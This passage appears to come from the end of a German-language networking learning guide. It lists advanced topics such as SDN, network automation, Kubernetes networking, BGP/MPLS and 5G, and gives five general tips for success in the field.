• Software-Defined Networking
• Network Automation (Python, Ansible)
• Cloud-Native Networking (Kubernetes, Service Mesh)
• Carrier-Grade Networks (BGP, MPLS, etc.)
• Wireless Technologies (5G, Wi-Fi 6E)
• Network Programmability (APIs, NETCONF/YANG)

Der Schlüssel zum Erfolg:

1. Praktiziere ständig (Theorie ohne Praxis ist nutzlos)
2. Bleib neugierig (Technologie ändert sich schnell)
3. Vernetze dich (Community ist wichtig)
4. Dokumentiere (Für dich und andere)
5. Hab Spaß (Wenn du es liebst, wirst du gut darin)